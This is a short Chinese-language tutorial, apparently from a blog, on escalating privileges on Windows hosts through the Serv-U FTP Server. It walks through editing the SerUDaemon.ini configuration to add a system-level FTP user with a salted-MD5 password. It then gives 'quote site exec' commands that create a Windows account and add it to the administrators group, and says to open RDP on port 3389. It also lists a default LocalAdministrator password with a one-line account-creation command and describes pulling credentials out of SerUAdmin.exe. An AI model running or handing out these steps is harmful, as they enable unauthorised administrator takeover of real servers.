Serv-U FTP Server，是一种被广泛运用的FTP服务器端软件，支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等 

 Serv-U提权分两种

1.有修改权限

2.无权限修改

第一种情况时

0.判断是否安装serv-u

serv-u的默认端口是43958  可以用nmap 扫描确认 

1.检查是否有可写权限

一般安装目录 c:\Program Files\Serv-u\SerUDaemon.ini

 打开配置文件

 2.增加用户

在user4=添加一个系统用户

复制一个 修改名字

password 密码格式 是  gw+md5     我从https://www.cmd5.com/   把gw123456  加密  注意gw是他的 盐 属于密码规则   

把加密完的密码去替换复制的密码  password=gw+md5(gw123456)

maintenance=system   是代表系统权限  user=你命名的用户 

cmd访问 ftp 连接  ip  输入你刚刚添加的用户密码 

输入  

quote site exec net user username password /add

quote site exec net localgroup administrators username /add  

利用ftp命令quote site exec 添加用户 加入administrators 权限组

打开3389连接

  第二种情况无修改权限

1.利用md5 直接去解密（ini 文件密码在ftp连）

2.默认密码，默认用户

账户：LocalAdministrator ，密码：#l@$ak#.lk;0@P

命令cmd /c net user DisKill /add & net localgroup administrators DisKill /add

 3.不是默认密码时 直接把SerUAdmin.exe 下载下来 进行查看密码

直接记住这里选an字符串

. 后面就是密码  把它替换到

这也叫溢出提权

至此常用的方式都已经说了。